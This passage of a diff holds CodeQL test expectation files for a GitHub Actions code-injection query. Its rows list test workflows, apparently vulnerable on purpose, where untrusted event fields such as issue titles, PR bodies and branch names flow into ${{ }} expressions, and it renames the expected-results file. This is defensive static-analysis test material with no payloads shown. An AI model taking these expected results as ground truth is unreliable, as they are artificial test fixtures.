.github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref new file mode 100644 index 000000000000..9af8ec0f9ab1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-094/CodeInjectionCritical.ql diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected similarity index 74% rename from ql/test/query-tests/Security/CWE-094/CodeInjection.expected rename to ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index e47c6dd340cb..298c4ce75a48 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -9,8 +9,6 @@ edges | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | -| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | @@ -46,6 +44,8 @@ edges | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | +| .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | +| .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | @@ -77,6 +77,10 @@ edges | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | nodes +| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | @@ -93,10 +97,6 @@ nodes | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | semmle.label | steps.changed-files3.outputs.all_changed_files | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | semmle.label | Uses Step: changed-files5 | | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | semmle.label | steps.changed-files5.outputs.all_changed_files | -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | -| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | @@ -201,6 +201,10 @@ nodes | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | @@ -256,8 +260,31 @@ nodes | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | subpaths #select +| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | ${{ steps.changed-files3.outputs.all_changed_files }} | | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | ${{ steps.changed-files5.outputs.all_changed_files }} | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | -| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 